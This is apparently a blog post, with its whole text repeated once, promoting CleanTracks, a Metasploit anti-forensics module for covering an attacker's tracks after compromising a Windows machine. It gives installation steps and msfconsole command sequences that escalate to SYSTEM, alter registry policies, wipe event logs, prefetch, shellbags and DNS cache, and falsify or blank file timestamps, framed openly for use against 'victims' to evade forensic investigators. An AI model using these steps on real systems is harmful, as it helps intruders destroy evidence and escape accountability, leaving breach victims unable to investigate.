Hello everyone, Hope everyone's fine :) Today, im gonna discuss about a Anti-Forensics module in metasploit coded by r00t 3xp10it - SSA
We often hacks our targets using metasploit but after we completes the exploitation do we notice that if the victim could call forensics guys to get the attacker ?
Metasploit doesn't has any module to do anti forensics job, CleanTracks is designed to remove traces often left by attacker in victim system and completes job without leaving any string leading to attacker :)
As metasploit framework long time user i realized that in actual database does not exist any module that covers your tracks efficiently (in a forensic data breach investigation) after a successfully exploitation. Looking at the actual database we can only find two 'meterpreter' modules that help us in your task: 'clearev' that clears the Applications, System and Security logs on a Window system (event viewer) and 'timestomp' to manipulate the MACE (Modified, Accessed, Changed) times of a file/appl (windows systems)...
Actually CleanTracks removes all logs in windows system stage by stage and also uses timestomp modules to change last accessed of files like cmd.exe , rundll32.exe , USER32.exe.
CleanTracks is simple to use and is used like all the other modules by setting required credentials like session id. In metasploit db there are only 2 modules (clearev , timestomp) which currently supports anti-forensics but not in much critical level like Cleantracks do.
1. Prevent : Will elevate the privilege to "Administrator" and will get you the privilege of
NT AUTHORITY\SYSTEM to the backdoor or payload. Also it'll prevent creation of footprints on victim system. By adding some regedit keys to it.
2. Cleaner : clear temp/prefetch folders, flushdns cache, clear eventlogs, shellbags, lnk, tmp, dat, etc, this module should be run befor leaving the current session
3. timestomp : This step won't be working as like timestomp in normal msf :) actually its just automatically change the last modified and created dates of some files like cmd.exe
but it won't be changing the last accessed/used date and time because cmd is
constantly used by cleantracks to execute commands by attacker.
4. getsys : getprivs API call to elevate current session to nt authority/system, its advice to run it before running any of the stages describe above.
5. Mace Blank MACE values in target inputed directory OR sysmace blank MACE values in target system32 directory, this option will change the MACE attributes of all files to null values inside the sellected directory
6. revert : Revert regedit policies to default values, this option will reverse all registry keys added by CleanTracks.rb stage1 option.
7. logoff : logoff target machine (optional, more effective).
for ubuntu/debian users save file in /opt/metasploit-framework/modules/auxiliary/analyze/ :) and in CleanTracks.rb change class MetasploitModule to Metasploit3 :) otherwise some compatibility issue may rise while reloading all modules :)) (i've experienced it) :P
Download clean tracks from here
meterpreter > background
msf exploit(handler) > reload_all
msf exploit(handler) > use auxiliary/analyze/CleanTracks
msf post(CleanTracks) > info
msf post(CleanTracks) > show options
msf post(CleanTracks) > show advanced options
msf post(CleanTracks) > set [option(s)]
msf post(CleanTracks) > exploit
Stage 1 :
msf post(CleanTracks) > set getsys true
msf post(CleanTracks) > set prevent true
msf post(CleanTracks) > exploit
Before using prevent function ....
Prevent successfully launched :)
Regedit keys changed ;)
Stage2 :
msf post(CleanTracks) > unset getsys
msf post(CleanTracks) > set cleaner true
msf post(CleanTracks) > exploit
Cleaner successfully launched ;)
timestomp :
msf post(CleanTracks) > unset getsys
msf post(CleanTracks) > unset cleaner
msf post(CleanTracks) > set dirmace Path_to_folder
msf post(CleanTracks) > exploit
Before using function
Function executed Successfully
Proof Of Concept ;)
CleanTracks - Anti-forensics auxiliary
Supporters : Betto Avalos [debugging],
Chaitanya [debugging], Spirit [debugging]
We often hacks our targets using metasploit but after we completes the exploitation do we notice that if the victim could call forensics guys to get the attacker ?
Metasploit doesn't has any module to do anti forensics job, CleanTracks is designed to remove traces often left by attacker in victim system and completes job without leaving any string leading to attacker :)
-- [IDEA]
As metasploit framework long time user i realized that in actual database does not exist any module that covers your tracks efficiently (in a forensic data breach investigation) after a successfully exploitation. Looking at the actual database we can only find two 'meterpreter' modules that help us in your task: 'clearev' that clears the Applications, System and Security logs on a Window system (event viewer) and 'timestomp' to manipulate the MACE (Modified, Accessed, Changed) times of a file/appl (windows systems)...
-- [ So, Basically how does clean tracks works ? ]
Actually CleanTracks removes all logs in windows system stage by stage and also uses timestomp modules to change last accessed of files like cmd.exe , rundll32.exe , USER32.exe.
CleanTracks is simple to use and is used like all the other modules by setting required credentials like session id. In metasploit db there are only 2 modules (clearev , timestomp) which currently supports anti-forensics but not in much critical level like Cleantracks do.
-- [Advanced Options]
-- [ Different Functions In CleanTracks To Remove All Traces ]
1. Prevent : Will elevate the privilege to "Administrator" and will get you the privilege of
NT AUTHORITY\SYSTEM to the backdoor or payload. Also it'll prevent creation of footprints on victim system. By adding some regedit keys to it.
2. Cleaner : clear temp/prefetch folders, flushdns cache, clear eventlogs, shellbags, lnk, tmp, dat, etc, this module should be run befor leaving the current session
3. timestomp : This step won't be working as like timestomp in normal msf :) actually its just automatically change the last modified and created dates of some files like cmd.exe
but it won't be changing the last accessed/used date and time because cmd is
constantly used by cleantracks to execute commands by attacker.
4. getsys : getprivs API call to elevate current session to nt authority/system, its advice to run it before running any of the stages describe above.
5. Mace Blank MACE values in target inputed directory OR sysmace blank MACE values in target system32 directory, this option will change the MACE attributes of all files to null values inside the sellected directory
6. revert : Revert regedit policies to default values, this option will reverse all registry keys added by CleanTracks.rb stage1 option.
7. logoff : logoff target machine (optional, more effective).
-- [INSTALLING CLEANTRACKS]
for ubuntu/debian users save file in /opt/metasploit-framework/modules/auxiliary/analyze/ :) and in CleanTracks.rb change class MetasploitModule to Metasploit3 :) otherwise some compatibility issue may rise while reloading all modules :)) (i've experienced it) :P
Download clean tracks from here
meterpreter > background
msf exploit(handler) > reload_all
msf exploit(handler) > use auxiliary/analyze/CleanTracks
msf post(CleanTracks) > info
msf post(CleanTracks) > show options
msf post(CleanTracks) > show advanced options
msf post(CleanTracks) > set [option(s)]
msf post(CleanTracks) > exploit
-- [SOME EXPLOITING EXAMPLES]
Stage 1 :
msf post(CleanTracks) > set getsys true
msf post(CleanTracks) > set prevent true
msf post(CleanTracks) > exploit
Before using prevent function ....
Prevent successfully launched :)
Regedit keys changed ;)
Stage2 :
msf post(CleanTracks) > unset getsys
msf post(CleanTracks) > set cleaner true
msf post(CleanTracks) > exploit
Cleaner successfully launched ;)
timestomp :
msf post(CleanTracks) > unset getsys
msf post(CleanTracks) > unset cleaner
msf post(CleanTracks) > set dirmace Path_to_folder
msf post(CleanTracks) > exploit
Function executed Successfully
Proof Of Concept ;)
CleanTracks - Anti-forensics auxiliary
Supporters : Betto Avalos [debugging],
Chaitanya [debugging], Spirit [debugging]
0 comments:
Post a Comment